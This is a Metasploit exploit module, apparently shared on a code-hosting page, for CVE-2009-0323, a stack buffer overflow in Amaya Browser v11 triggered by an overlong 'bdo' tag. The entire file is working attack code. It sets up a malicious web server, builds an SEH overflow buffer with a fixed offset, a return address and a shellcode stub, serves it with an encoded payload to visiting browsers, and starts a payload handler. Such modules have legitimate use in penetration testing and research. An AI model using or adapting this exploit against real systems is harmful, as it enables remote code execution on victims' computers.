Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => "Amaya Browser v11.0 'bdo' Tag Overflow",
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in the Amaya v11 Browser.
17
          By sending an overly long string to the "bdo"
18
          tag, an attacker may be able to execute arbitrary code.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         => [ 'dookie, original exploit by Rob Carter' ],
22
      'References'     =>
23
        [
24
          [ 'CVE', '2009-0323' ],
25
          [ 'OSVDB', '55721' ],
26
          [ 'BID', '33046' ],
27
          [ 'BID', '33047' ]
28
        ],
29
      'DefaultOptions' =>
30
        {
31
          'EXITFUNC' => 'process',
32
        },
33
      'Payload'        =>
34
        {
35
          'Space'         => 970,
36
          'BadChars'      => "\x00",
37
          'StackAdjustment' => -3500,
38
        },
39
      'Platform'       => 'win',
40
      'Targets'        =>
41
        [
42
          [ 'Amaya Browser v11',     { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll
43
        ],
44
      'DisclosureDate' => '2009-01-28',
45
      'DefaultTarget'  => 0))
46
  end
47

48

49
  def on_request_uri(cli, request)
50
    # Re-generate the payload
51
    return if ((p = regenerate_payload(cli)) == nil)
52

53
    # Set the exploit buffer
54
    sploit = "<bdo dir=\""
55
    sploit += rand_text_alpha(6889)
56
    sploit += "\x74\x06\x41\x41"
57
    sploit += [target.ret].pack('V')
58
    sploit += "\x68\x7f\x01\x01\x7f"   # push 7F01017F
59
    sploit += "\x58"		   # pop EAX
60
    sploit += "\x2d\x18\x69\x45\x7d"   # sub EAX, 7A7A0857
61
    sploit += "\x50"		   # push EAX
62
    sploit += "\xc3"		   # RETN
63
    sploit += make_nops(100)
64
    sploit += payload.encoded
65
    sploit += make_nops(970 - payload.encoded.length)
66
    sploit += "\">pwned!</bdo>"
67

68
    print_status("Sending #{self.name}")
69

70
    # Transmit the response to the client
71
    send_response_html(cli, sploit)
72

73
    # Handle the payload
74
    handler(cli)
75
  end
76
end
77

78